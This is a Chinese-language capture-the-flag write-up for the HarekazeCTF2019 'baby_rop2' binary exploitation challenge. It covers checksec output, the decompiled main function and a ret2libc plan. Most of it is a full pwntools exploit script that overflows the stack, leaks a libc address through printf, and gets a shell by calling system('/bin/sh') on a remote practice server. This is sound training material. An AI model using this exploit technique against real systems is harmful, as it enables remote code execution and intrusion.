HarekazeCTF2019babyrop2
# HarekazeCTF2019_baby_rop2
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/HarekazeCTF2019_baby_rop2/babyrop2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下
int __cdecl main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);
vuln();
return 0;
}
1
2
3
4
5
6
2
3
4
5
6
# 思路分析
- 目前信息:
- 明显的栈溢出漏洞
plt
内无system
- 无/
bin/sh
字符串 - No PIE
- 思路:
ret2libc
做法
# exp
from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/HarekazeCTF2019_baby_rop2/babyrop2'
io = remote('node4.buuoj.cn', 29266)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x20+8
pop_rdi_ret = 0x400733
pop_rsi_r15_ret = 0x400731
format_addr = 0x400770
printf_plt = elf.plt['printf']
libc_start_main_got = elf.got['__libc_start_main']
main_addr = elf.symbols['main']
payload = flat(['a'*padding, pop_rdi_ret, format_addr, pop_rsi_r15_ret,libc_start_main_got, 0xdeadbeef, printf_plt, main_addr])
io.sendafter("What's your name? ", payload)
leak_libc_start_main = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc = LibcSearcher('__libc_start_main', leak_libc_start_main)
libcbase = leak_libc_start_main-libc.dump('__libc_start_main')
system = libcbase+libc.dump('system')
bin_sh = libcbase+libc.dump('str_bin_sh')
payload = flat(['a'*padding, pop_rdi_ret, bin_sh, system])
io.sendafter("What's your name? ", payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
上次更新: 2022/08/15, 00:29:49